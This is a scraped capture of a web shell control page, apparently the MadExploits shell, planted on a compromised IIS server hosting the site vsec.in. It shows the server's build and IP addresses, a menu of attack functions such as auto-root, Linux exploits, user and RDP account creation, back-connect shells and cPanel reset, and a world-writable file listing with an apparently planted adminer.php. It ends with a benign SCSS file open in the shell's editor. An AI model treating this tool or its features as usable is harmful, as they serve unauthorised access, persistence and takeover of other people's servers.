Windows NT VMI608383 10.0 build 17763 (Windows Server 2019) AMD64
Microsoft-IIS/10.0
: 144.126.137.138 | : 216.73.216.113
Cant Read [ /etc/named.conf ]
8.1.33
IWPD_484(vsec.in_n1)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
vsec.in /
httpdocs /
Admin /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
navs
[ DIR ]
drwxrwxrwx
utilities
[ DIR ]
drwxrwxrwx
_buttons.scss
980
B
-rw-rw-rw-
_cards.scss
733
B
-rw-rw-rw-
_charts.scss
454
B
-rw-rw-rw-
_dropdowns.scss
356
B
-rw-rw-rw-
_error.scss
1.11
KB
-rw-rw-rw-
_footer.scss
196
B
-rw-rw-rw-
_global.scss
886
B
-rw-rw-rw-
_login.scss
893
B
-rw-rw-rw-
_mixins.scss
1
B
-rw-rw-rw-
_navs.scss
85
B
-rw-rw-rw-
_utilities.scss
239
B
-rw-rw-rw-
_variables.scss
2.42
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
sb-admin-2.scss
504
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _error.scss
// Lucas Bebber's Glitch Effect // Tutorial and CSS from CSS Tricks // https://css-tricks.com/glitch-effect-text-images-svg/ .error { color: $gray-800; font-size: 7rem; position: relative; line-height: 1; width: 12.5rem; } @keyframes noise-anim { $steps: 20; @for $i from 0 through $steps { #{percentage($i*(1/$steps))} { clip: rect(random(100)+px,9999px,random(100)+px,0); } } } .error:after { content: attr(data-text); position: absolute; left: 2px; text-shadow: -1px 0 $red; top: 0; color: $gray-800; background: $gray-100; overflow: hidden; clip: rect(0,900px,0,0); animation: noise-anim 2s infinite linear alternate-reverse; } @keyframes noise-anim-2 { $steps: 20; @for $i from 0 through $steps { #{percentage($i*(1/$steps))} { clip: rect(random(100)+px,9999px,random(100)+px,0); } } } .error:before { content: attr(data-text); position: absolute; left: -2px; text-shadow: 1px 0 $blue; top: 0; color: $gray-800; background: $gray-100; overflow: hidden; clip: rect(0,900px,0,0); animation: noise-anim-2 3s infinite linear alternate-reverse; }
Close